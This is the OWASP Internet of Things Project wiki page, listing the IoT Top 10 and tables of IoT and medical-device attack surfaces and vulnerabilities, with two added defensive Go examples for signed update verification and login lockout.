* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The OWASP IoT Project is currently reviewing the Top Ten list for 2018. The official launch date is December 2018. Provide your insight and expertise by joining the #iot-security channel meetups on Slack.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for outdated software versions and the attacks that apply to them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* Over-the-air (OTA) firmware updates can be blocked<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of a single static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Disclosure of authentication/authorization values (session key, token, cookie, etc.)<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physical)<br />
<br />
|-<br />
|}<br />
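The ''Update Mechanism'' row above (updates not signed, update verification, update authentication) and the ''Firmware downgrade possibility'' item under Device Firmware describe what a device-side update check has to enforce. The following Go program is an added example written for this page, not code from the OWASP IoT project: the vendor side signs a small update manifest with Ed25519, and the device side verifies the signature with a pinned public key, checks the image hash named by the signed manifest, and refuses any version that is not strictly newer than the one installed. The two-line manifest format, the function names and the sample image are assumptions; transport encryption (TLS) for the download itself is a separate control not shown here.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"strconv"
	"strings"
)

// Added illustration only. The two-line manifest format ("version=N" and
// "sha256=<hex>"), the function names and the sample image are assumptions.

// Manifest describes one update: a monotonically increasing version and the
// SHA-256 of the image it authorises.
type Manifest struct {
	Version uint64
	Image   [32]byte
}

// ParseManifest parses the assumed plain-text manifest format.
func ParseManifest(text string) (Manifest, error) {
	var m Manifest
	var haveVer, haveHash bool
	for _, line := range strings.Split(strings.TrimSpace(text), "\n") {
		kv := strings.SplitN(line, "=", 2)
		if len(kv) != 2 {
			return m, fmt.Errorf("malformed manifest line %q", line)
		}
		switch kv[0] {
		case "version":
			n, err := strconv.ParseUint(kv[1], 10, 64)
			if err != nil {
				return m, err
			}
			m.Version, haveVer = n, true
		case "sha256":
			b, err := hex.DecodeString(kv[1])
			if err != nil || len(b) != sha256.Size {
				return m, errors.New("bad sha256 field")
			}
			copy(m.Image[:], b)
			haveHash = true
		}
	}
	if !haveVer || !haveHash {
		return m, errors.New("manifest missing version or sha256")
	}
	return m, nil
}

// VerifyUpdate is the device-side check, in this order: the signature over the
// raw manifest bytes (vendor public key pinned in the firmware), the image hash
// named by that signed manifest, and a monotonic version compare that refuses
// downgrades and replays of older, still validly signed updates.
func VerifyUpdate(pub ed25519.PublicKey, manifest, sig, image []byte, installed uint64) (Manifest, error) {
	if !ed25519.Verify(pub, manifest, sig) {
		return Manifest{}, errors.New("manifest signature invalid")
	}
	m, err := ParseManifest(string(manifest))
	if err != nil {
		return Manifest{}, err
	}
	if sha256.Sum256(image) != m.Image {
		return Manifest{}, errors.New("image hash does not match signed manifest")
	}
	if m.Version <= installed {
		return Manifest{}, fmt.Errorf("refusing downgrade or replay: version %d <= installed %d", m.Version, installed)
	}
	return m, nil
}

// BuildSignedUpdate is the vendor (release pipeline) side, included so the
// example runs end to end; the private key never ships on the device.
func BuildSignedUpdate(priv ed25519.PrivateKey, version uint64, image []byte) (manifest, sig []byte) {
	h := sha256.Sum256(image)
	manifest = []byte(fmt.Sprintf("version=%d\nsha256=%s\n", version, hex.EncodeToString(h[:])))
	return manifest, ed25519.Sign(priv, manifest)
}

func main() {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader)
	image := []byte("constructed firmware image, version 2")
	manifest, sig := BuildSignedUpdate(priv, 2, image)

	_, err := VerifyUpdate(pub, manifest, sig, image, 1)
	fmt.Println("genuine update from v1:", err)
	_, err = VerifyUpdate(pub, manifest, sig, []byte("tampered image"), 1)
	fmt.Println("tampered image:", err)
	_, err = VerifyUpdate(pub, manifest, sig, image, 2)
	fmt.Println("replayed against v2:", err)
}
```

The order of checks matters: the signature is verified before the manifest is parsed, so no untrusted bytes are interpreted until they are known to come from the vendor, and the version compare happens only on a manifest whose authenticity and image hash have already been established.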
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to trivial values such as '1234' or '123456'<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented but is improperly configured or not kept up to date, e.g. still using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* The storage location for update files is world-writable, potentially allowing modified firmware to be distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* A service can be attacked in a way that denies service, either to that service alone or to the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as the source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of the firmware on the device and bypass almost all software-based security controls.<br />
* Side channel attacks can also modify the execution flow or be used to leak interesting information from the device.<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Security measures usually include custom bootloaders that prevent the attacker from entering single-user mode, but these can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH, web servers, etc.<br />
|-<br />
<br />
|}<br />
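The first three rows of this table (username enumeration, weak passwords, account lockout) are usually fixed in one place: the device's login handler. The following Go program is an added example for this page, not code from the OWASP IoT project. It rejects default or trivial passwords at enrolment, returns one indistinguishable error for unknown user, wrong password and locked account, and locks the account after five consecutive failures (inside the 3 - 5 range given in the Account Lockout row). Type names, thresholds and the sample accounts are assumptions; the SHA-256 stand-in keeps the example dependency-free, whereas a real device should store passwords with a slow hash such as bcrypt or Argon2.

```go
package main

import (
	"crypto/sha256"
	"crypto/subtle"
	"errors"
	"fmt"
	"strings"
	"time"
)

// Added illustration only; the type names, thresholds and sample accounts are
// assumptions. SHA-256 stands in for a real slow password hash (bcrypt, Argon2).

const (
	maxFailures    = 5                // consecutive failures before lockout
	lockoutWindow  = 15 * time.Minute // how long the lock lasts
	minPasswordLen = 12
)

// ErrLoginFailed is the one error returned for unknown user, wrong password and
// locked account alike, so the response never reveals which usernames exist.
var ErrLoginFailed = errors.New("login failed")

// Factory defaults and trivial values that must never be accepted as a password.
var weakPasswords = map[string]bool{
	"1234": true, "12345": true, "123456": true, "password": true,
	"admin": true, "admin123": true, "default": true, "welcome1": true,
}

type account struct {
	hash        [sha256.Size]byte
	failures    int
	lockedUntil time.Time
}

type Authenticator struct{ accounts map[string]*account }

func NewAuthenticator() *Authenticator { return &Authenticator{accounts: map[string]*account{}} }

// CheckPasswordPolicy rejects short passwords and anything on the deny-list.
func CheckPasswordPolicy(pw string) error {
	if len(pw) < minPasswordLen {
		return fmt.Errorf("password shorter than %d characters", minPasswordLen)
	}
	if weakPasswords[strings.ToLower(pw)] {
		return errors.New("password is a known default or trivial value")
	}
	return nil
}

// SetPassword applies the policy at enrolment and at first-boot setup.
func (a *Authenticator) SetPassword(user, pw string) error {
	if err := CheckPasswordPolicy(pw); err != nil {
		return err
	}
	a.accounts[user] = &account{hash: sha256.Sum256([]byte(pw))}
	return nil
}

// Login verifies a credential with lockout and a single failure path.
func (a *Authenticator) Login(user, pw string) error {
	got := sha256.Sum256([]byte(pw)) // hash before any branch: same work for every caller
	acct, ok := a.accounts[user]
	if !ok {
		_ = subtle.ConstantTimeCompare(got[:], got[:]) // keep timing close to the real path
		return ErrLoginFailed
	}
	now := time.Now()
	if now.Before(acct.lockedUntil) {
		return ErrLoginFailed // locked: even the right password is refused
	}
	if subtle.ConstantTimeCompare(got[:], acct.hash[:]) != 1 {
		acct.failures++
		if acct.failures >= maxFailures {
			acct.lockedUntil = now.Add(lockoutWindow)
			acct.failures = 0
		}
		return ErrLoginFailed
	}
	acct.failures = 0
	return nil
}

// IsLocked reports whether the account is currently locked out.
func (a *Authenticator) IsLocked(user string) bool {
	acct, ok := a.accounts[user]
	return ok && time.Now().Before(acct.lockedUntil)
}

func main() {
	a := NewAuthenticator()
	fmt.Println("set password 'admin':", a.SetPassword("admin", "admin"))
	_ = a.SetPassword("tech", "correct horse battery staple")
	for i := 0; i < maxFailures; i++ {
		fmt.Println("bad attempt:", a.Login("tech", "wrong-password"))
	}
	fmt.Println("locked:", a.IsLocked("tech"), "| right password now:", a.Login("tech", "correct horse battery staple"))
}
```

A time-based lockout is used rather than a permanent one so that an attacker who knows a valid username cannot turn the lockout itself into a denial of service against that account; the generic error and the equal-work path for unknown users are what close the enumeration channel.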
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of a single static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Disclosure of authentication/authorization values (session key, token, cookie, etc.)<br />
* Reuse of session keys, tokens, etc.<br />
* Device to device authentication<br />
* Device to mobile application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
